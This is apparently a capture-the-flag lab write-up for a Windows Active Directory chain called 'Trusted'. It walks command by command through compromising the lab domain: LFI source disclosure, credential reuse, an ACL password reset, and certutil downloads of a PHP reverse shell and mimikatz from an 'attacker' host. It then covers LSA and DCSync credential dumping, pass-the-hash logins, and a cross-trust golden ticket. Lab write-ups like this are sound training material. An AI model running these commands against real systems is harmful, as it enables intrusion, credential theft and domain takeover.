Skip to main content

Chain - Trusted

Writeup Author: bobbuilder

Overview

Category: Chain

Difficulty: Easy Windows

Machine Author: r0BIT

Domain: trusted.vl

Machines:

  • trusted.vl (Windows Domain Controller)
  • lab.trusted.vl (XAMPP test environment)

Objective: Domain Admin compromise in trusted.vl through:

  • Exposed XAMPP web server with LFI and credential disclosure
  • MySQL credential reuse for initial AD user access
  • ACL abuse to reset another user's password
  • Privilege escalation via SeMachineAccountPrivilege
  • Remote code execution via PHP shell
  • Dumping local admin credentials using mimikatz
  • Cross-trust attack using a Golden Ticket
  • Full compromise of parent domain trusted.vl

Web Enumeration (10.10.226.246)

XAMPP Apache

  • Version: Apache/2.4.53, PHP/8.1.6
  • phpinfo exposed: /dashboard/phpinfo.php
  • allow_url_fopen enabled

Fuzzing

wfuzz -c --hh 306 -w raft-medium-directories.txt http://labdc.lab.trusted.vl/FUZZ
Found: /dev

LFI + Source Disclosure:

/dev/index.html?view=php://filter/convert.base64-encode/resource=db.php
Credentials found:
- User: root
- Pass: [REDACTED]

MySQL Access

mysql -h labdc.lab.trusted.vl -u root -p
use news;
select * from users;

Cracked rsmith password:

[REDACTED]

SMB + BloodHound

nxc smb 10.10.136.38 -u rsmith -p '[REDACTED]' --shares
bloodhound-python -u rsmith -p [REDACTED] -d lab.trusted.vl -dc labdc.lab.trusted.vl -ns 10.10.136.38
  • rsmith can reset ewalters's password

PrivEsc: ewalters Access

Set-DomainUserPassword -Identity EWALTERS -AccountPassword [REDACTED]

Login via WinRM:

evil-winrm -i 10.10.136.38 -u ewalters -p [REDACTED]
  • Has SeMachineAccountPrivilege

Readme.txt Clue

C:/AVTest/readme.txt
Christine ran AV tools - likely test environment

XAMPP RCE via PHP Reverse Shell

certutil.exe -urlcache -split -f http://attacker/winphprevshell.php rev.php
Visit https://labdc.lab.trusted.vl/rev.php

Gain SYSTEM shell

Dump Credentials (Local Admin Access)

certutil.exe -urlcache -split -f http://attacker/mimikatz.exe mimikatz.exe
mimikatz "privilege::debug" "lsadump::lsa /patch"

Dumped Administrator NTLM hash: [REDACTED]

Login as Administrator

evil-winrm -i 10.10.136.38 -u Administrator -H [REDACTED]

Dump Other Credentials

secretsdump.py lab.trusted.vl/'LABDC$'@10.10.136.38 -hashes :[REDACTED]

Trust Enumeration

Get-ADTrust -Filter *
BiDirectional trust: lab.trusted.vl <-> trusted.vl

Cross-Trust Attack (Golden Ticket)

krbtgt NTLM (child): [REDACTED]
Domain SID (parent): S-1-5-21-3576695518-347000760-3731839591

Create Golden Ticket:

mimikatz "kerberos::golden /user:Administrator /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /krbtgt:[REDACTED] /sids:S-1-5-21-3576695518-347000760-3731839591-519 /ptt"

Dump Trusted DC creds:

lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /all

Administrator NTLM (trusted): [REDACTED]

Full DA Access to Trusted Domain

evil-winrm -i 10.10.226.245 -u Administrator -H [REDACTED]

(Optional) Automated Golden Ticket

impacket-raiseChild lab.trusted.vl/cpowers -hashes :[REDACTED]

Final Step - Decrypt Flag

[System.IO.File]::GetAttributes("C:\Users\Administrator\Desktop\root.txt").ToString().Contains("Encrypted")

Set new admin password and run:

runas.exe Administrator "[REDACTED]" "cmd.exe /c type C:\Users\Administrator\Desktop\root.txt"
Back to top